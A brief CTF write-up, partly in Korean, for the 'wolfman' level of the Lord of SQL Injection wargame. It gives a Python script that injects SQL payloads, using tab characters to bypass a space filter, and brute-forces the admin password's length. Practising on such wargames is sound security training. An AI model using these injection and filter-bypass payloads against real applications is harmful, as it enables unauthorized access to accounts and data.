Lord of SQL Injection(LOS) - wolfman

import requests

requests.packages.urllib3.disable_warnings()
org_url     = "https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php"
header  = {'Cookie': 'PHPSESSID='}
session = requests.session()



# Check Length of PW
for i in range(0, 100):
    payload = "?pw=ABCD'%09or%09id='admin'%09and%09length(pw)=" + "'" + str(i)
    res = session.get(url = org_url + payload, headers=header, verify=False)

    if "Hello admin" in res.text:
        print("Length of PW is [ %d ]\n" % i)
        break

이전과 비슷한 문항이나 이번에는 단지 id 가 admin 인 것만을 비교한다.

 

더 쉬운 문제다. admin 계정의 PW 길이만을 유추해내면 된다.